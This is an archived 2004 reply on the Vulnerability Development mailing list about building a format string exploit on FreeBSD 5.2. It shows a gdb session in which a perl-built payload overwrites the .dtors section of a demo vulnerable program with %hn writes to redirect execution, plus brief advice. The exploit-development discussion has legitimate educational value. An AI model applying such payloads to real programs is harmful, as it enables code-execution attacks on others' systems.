Vulnerability Development mailing list archives
Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT
From: Vlad902 <vlad902 () gmail com>
Date: Fri, 30 Jul 2004 17:24:45 -0700
-bash-2.05b$ uname -msr FreeBSD 5.2.1-RC2 i386 -bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c -bash-2.05b$ nm fmt_vuln | grep __DTOR_END__ 08049848 d __DTOR_END__ -bash-2.05b$ gdb -q ./fmt_vuln (no debugging symbols found)...(gdb) (gdb) x/1s 0xbfbfedf5 0xbfbfedf5: "EGG=vlad902" (gdb) b * 0xbfbfedf9 Breakpoint 1 at 0xbfbfedf9 (gdb) run `perl -e 'print "\x4a\x98\x04\x08\xff\xff\xff\xff\xee\xee\xee\xee\x48\x98\x04\x08" . "%.49045u%.8x%.8x%.8x.%x%hn%x%.11826u%hn%x"'` ... [*] test_val @ 0x0804979c = -72 0xffffffb8 (no debugging symbols found)...(no debugging symbols found)... Breakpoint 1, 0xbfbfedf9 in ?? ()
Can somebody give me some hints, advices and guides?
Only advice I can give you is do it by hand rather then having tools do it for you. Although while exploiting it beware, I found the stack is very quirky which is why I seem to have so many useless %x s' lieing around -vlad902
Current thread:
- Problem with format string exploit dev in FreeBSD 5.2-CURRENT Ganbold (Jul 30)
- Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT infamous41md (Jul 31)
- <Possible follow-ups>
- Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT Vlad902 (Jul 30)